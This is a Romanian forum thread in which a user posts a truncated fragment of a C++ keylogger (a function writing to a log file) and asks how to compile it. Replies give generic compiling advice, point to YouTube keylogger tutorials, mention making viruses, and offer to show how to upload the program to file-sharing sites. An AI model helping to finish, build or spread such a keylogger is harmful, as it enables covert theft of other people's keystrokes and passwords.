| Junseng a întrebat:

Salut am si eu un script de Keylogger dar nu stiu cum sa il fac program executabil:
#include

using std::fstream;
using std::ofstream;

void WriteData(std::string Text) {
ofstream LogFile;
LogFile. open("Keylogs.txt", fstream::app);
LogFile

6 răspunsuri:
suntserios
| suntserios a răspuns:

Cine stie ce ai tu acolo

in orice cod cpp devine executabil in urma compilarii cu succes. Deci l ai compilat?

| Junseng explică (pentru suntserios):

Pai asta vreau sa stiu:cum il compilez

| suntserios a răspuns (pentru Junseng):

Cu ajutorul unui compilator de cpp. instalezi compilatorul, eventual un ide si gata

| Andrei900Boss a răspuns:

Ca sa il faci program executabil il poti salva adica il poti face program Utitled1.exe daca l-ai facut bine? si poti face si virusi dar uitate pe Youtube C++ keylogger o sa il ai succes.

| Andrei900Boss a răspuns:

Si ca sa il opresti intra pe task Manager si apasa pe programul ala si acolo stii ce ai de facut. si sa fie cod C++ bine facute sau te uici pe Youtube cum faci program executabil.

| Andrei900Boss a răspuns:

Daca vrei te pot invata cum se baga programul pe netwinking pe mega sau pe site-urile tot ca mega, mediaFire cam atat.winking